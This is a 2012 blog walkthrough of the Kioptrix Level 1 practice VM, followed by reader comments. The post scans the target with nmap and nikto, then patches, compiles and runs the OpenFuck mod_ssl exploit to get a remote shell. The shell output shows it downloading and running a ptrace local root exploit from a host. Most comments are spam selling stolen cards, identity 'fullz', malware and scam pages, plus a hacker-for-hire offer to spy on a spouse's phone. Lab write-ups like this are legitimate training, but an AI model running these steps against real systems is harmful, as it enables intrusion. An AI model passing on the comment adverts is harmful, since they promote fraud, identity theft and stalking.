Sunday, 12 August 2012

Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)



Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)
Hi everyone, in this post I will be demonstrating how to hack Kioptrix Level 1 .But what is kioptrix? Its a linux distro with lots of vulnerabilities, so we can play and test our knowledgement. To download, go to : http://www.kioptrix.com/blog/?page_id=135  , and use vmware player to open the files and you are ready to go.So, now that's everything up and running, we need to discover the IP address of the target machine because it gets via DHCP from your network ( by the way, you need a DHCP server in order for this to work). To find out what's the IP address , lets run an nmap on our network that will look for live hosts.

# nmap -sn 172.16.1.0/24
Nmap scan report for 172.16.1.144
Host is up (0.0010s latency).
MAC Address: 00:50:56:AF:5A:B9 (VMware)

Great, now that we found it the IP address, lets see what's running in the host.

#nmap -sV 172.16.1.144


Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-03 16:47 BST
Nmap scan report for 172.16.1.144
Host is up (0.033s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE              VERSION
22/tcp   open  ssh                  OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn          Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status (status V1)   1 (rpc #100024)
MAC Address: 00:50:56:AF:5A:B9 (VMware)


Ok, at this point there is a lot to do. We need to find if the running version of each open port has an exploit for the version.To get the proper version and vulnerability ID, lets use nikto to scan the host. I am not going to explain all vulnerabilities of the distro, I think two is good enough, you guys can try for your self's other ways to break into. So I am going to show how to break in using apache and samba.
1) cd /pentest/web/nikto/
2) ./nikto.pl -host 172.16.1.144
3) The results (The intersting bits) :
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.


Right, now we need to google it for the CVEs or you can search for the exploit on backtrack itself.
Run:
/pentest/exploits/exploitdb/searchsploit  apache linux remote
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit  /linux/remote/34.pl
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl   /linux/remote/38.pl
Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit    /linux/remote/126.c
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit     /linux/remote/132.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)/linux/remote/764.c
Apache Tomcat Connector (mod_jk) Remote  Exploit (exec-shield)     /linux/remote/4162.c
Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)     /linux/remote/4552.pl
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt


As you can see, there is one for OpenSSL (764.c) OpenFuck.
Now, because this is really old, you need to change the exploit a bit in order to make it work.
1) Add: #include <openssl rc4.h>
2) Add: #include <openssl md5.h>
3) Search inside the exploit for "wget" and change the url for the correct one because that is not valid anymore. If you google it for ptrace-kmod.c , you will find that the correct address is :
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
So, just change that on the exploit, save it .
Now we need to compile it, but before that, we need install the ssl-dev libraries.
Run :
apt-get install libssl-dev
cd /pentest/exploits/exploitdb/platforms/linux/remote
gcc -o OpenFuck 764.c -lcrypto
Run the exploit now
./OpenFuck
Look for the target, we know that its running apache on a redhat, and that is running 1.3.20 so lets filter that:
./OpenFuck  | grep -i redhat | grep "1.3.20"
That limits the results to only two
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
So we can try first the target as 0x6a and if that doesn't work, we can try 0x6b.
./OpenFuck 0x6a 172.16.1.144 443
Result :
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc3f0
Ready to send shellcode
Spawning shell...
Good Bye!

As you can see, that did not worked.
Lets try the other one now.
./OpenFuck 0x6b 172.16.1.144 443
Result:
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f83c0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; ttp://172.16.1.79/ptrace-kmod.c; gcc -
--09:18:29--  http://172.16.1.79/ptrace-kmod.c          => `ptrace-kmod.c'
Connecting to 172.16.1.79:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]    0K ...                   100% @   3.74 MB/s
09:18:29 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 17426
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


Success !! We got root on the box.
In the next video I will demonstrate how to hack using samba.

8 comments:

  1. This comment has been removed by the author.

    ReplyDelete
    Replies
    1. Hello All
      I'm offering following hacking services

      ..Western union Trf
      ..wire bank trf
      ..credit / debit cards
      ..Perfect Money / Bintcoing adders
      ..email hacking /tracing
      ..Mobile hacking / mobile spam

      ..hacking Tools
      ..Spamming Tools
      ..Scam pages
      ..spam tools scanners make your own tools
      ..Keyloggers+fud+xploits

      Fake peoples have just words to scam peoples
      they just cover their self that they are hacker
      but when you ask them a questions they don't have answer
      they don't have even knowledge what is hacking
      am dealing with real peoples who interested and honest
      also teaching hacking subjects in reasonable price
      with private tools and proof.

      Availability 24/7 contact only given below addresses
      salvrosti@gmail.com
      Icq: 718684828
      Skype: live:Salvrosti

      Delete
  2. I get these errors when I try to compile it. I have added the headers to it and everything but it seems like my amazing C experience isn't helping ^,^ ...

    764.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
    unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘read_ssl_packet’:
    764.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
    if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
    ^~~~~~~~~~~~~
    764.c:847:19: note: each undeclared identifier is reported only once for each function it appears in
    764.c: In function ‘get_server_hello’:
    764.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
    if (*(p++) != SSL2_MT_SERVER_HELLO) {
    ^~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘send_client_master_key’:
    764.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
    if (pkey->type != EVP_PKEY_RSA) {
    ^~
    764.c: In function ‘get_server_verify’:
    764.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
    if (buf[0] != SSL2_MT_SERVER_VERIFY) {
    ^~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘send_client_finished’:
    764.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
    buf[0] = SSL2_MT_CLIENT_FINISHED;
    ^~~~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘get_server_finished’:
    764.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
    if (buf[0] != SSL2_MT_SERVER_FINISHED) {

    ReplyDelete
    Replies
    1. You need to install apt-get install libssl1.0-dev

      I had the same issue!!

      Delete
    2. HACKING TOOLS FOR SALE
      THERE IS NO LIMETS ONLY FOR SERIOUS BUYERS

      ANDROID APK HACKING TOOLS OR VIRUS
      ALSO TAKE PRIVATELY CONSUMER BENEFITS
      --------------------------------------
      CVV FULLZ FRESH <---- UK+USA+TEXAS+CANDA .

      random : 25$ per one
      fullz : 35$ per one (come with <-- Dob + SSN + MMN + Driving license + )
      ------------------------------
      GMAIL BYPASS OR VIA PHISHING STOLAN SOME ONE BANK LOGIN CREDIT CARDS
      SPAMMING TOOLS.

      1:Smtp : 15$ for ip (4$ for Domain)
      2:Shell : 25$ per one
      3:Cpanel : 10$ per one
      4:Scam page 50$ for simple (60$ for undetectable)
      5:RDP : 25$ any country
      6:PHP mailer : 20$ per one
      -------------------------------------
      CARDING TOOLS.
      ONLINE SHOPPING PAID BILLS

      Socks 70$ any country
      RDP: 3$ any country
      HMA: 30$ unlimited 12 month
      Vip72: 260$ unlimited 6 month
      card validator : 60$ (for fixing un-valide card number and bin checker)
      wu Java bypass Script ,(by pass any page with your giving commands)
      ---------------------------------------
      VIRUS (RATE COOKIES STEALERS ANROID)

      zeus : 250$ (with fud crypted jpg,pdf or doc file)
      key loger : 150$ (for email,pm and btc logs)
      ninja Rat : 130$ (with fud crypted jpeg,pdf or doc file)
      cidital : 150$ (with fud crypted jpeg,pdf or doc file)
      ------------------------------------
      PRIVET SCANNERS.

      SSH Brute Force scaner: 200$ (windows based) (ssh roots or required for run)
      smtp scanner : 350$ (linux bassed) (ssh/root required for run )
      rdp scnnaer : 400$ (linux bassed) (ssh/root required for run)
      Smtp+rdp multi scanner : 600$ (linux bassed) (ssh/root required for run)
      cpanel scanner : 500$ (linux bassed) (ssh/root + 10 cpanel or shell required for run)
      root scanner : 800$ (linux bassed) (ssh/root required for run)
      --------------------------------------
      PRIVET ONLINE SERVICES .
      PAID BILLS AS YOUR DEMAND ONLINE WORLD WIDE

      paid hotel reservation online
      paid air bus ticketing
      western union transfer
      shipping electronics worldwide
      online e currancy dropers worldwide
      tex refunds ssn laeds uk usa
      ----------------------------
      -------- Contact us ---------
      skype: rushr00t000
      hang out: hackitbackd00r@gmail.com
      yahoo IMI: hackitbackdoor@yahoo.com


      Delete
  3. Hello all

    am looking few years that some guys comes into the market they called themselves

    hacker, carder or spammer they rip the peoples with different ways and it’s a badly

    impact to real hacker now situation is that peoples doesn’t believe that real hackers

    and carder scammer exists. We are also teaching all types of hacking within a few days

    make funds your own.

    Anyone want to make deal with us any type we are available but

    first will show the proof that our work is real then make a deal like

    ..Wire Bank Transfer

    ..WU

    ..MG

    ..SSN

    ..Hacking stuff

    ..BTC Generator

    ..PM Adder

    ..keylogger / scam pages / shell / hosting / SMTP / RDP / FTP

    Shipping product. Rippers / scammer stay away serious / needy contact about it.

    lykovine@yahoo.com

    ReplyDelete
  4. Hello All
    I'm offering following hacking services

    ..Western union Trf
    ..wire bank trf
    ..credit / debit cards
    ..Perfect Money / Bintcoing adders
    ..email hacking /tracing
    ..Mobile hacking / mobile spam

    ..hacking Tools
    ..Spamming Tools
    ..Scam pages
    ..spam tools scanners make your own tools
    ..Keyloggers+fud+xploits

    Fake peoples have just words to scam peoples
    they just cover their self that they are hacker
    but when you ask them a questions they don't have answer
    they don't have even knowledge what is hacking
    am dealing with real peoples who interested and honest
    also teaching hacking subjects in reasonable price
    with private tools and proof.

    Availability 24/7 contact only given below addresses
    salvrosti@gmail.com
    Icq: 718684828
    Skype: live:Salvrosti

    ReplyDelete
  5. Hello everyone, my name is Kate and I want to recommend a reliable hacker who helped hack my husband's cell phone remotely.

    Which gave me full access to all his texts and, and now he has nothing to hide from me. If you require his service, contact ghosthacker2351@gmail.com, tell him Kate referred you he'll help.

    ReplyDelete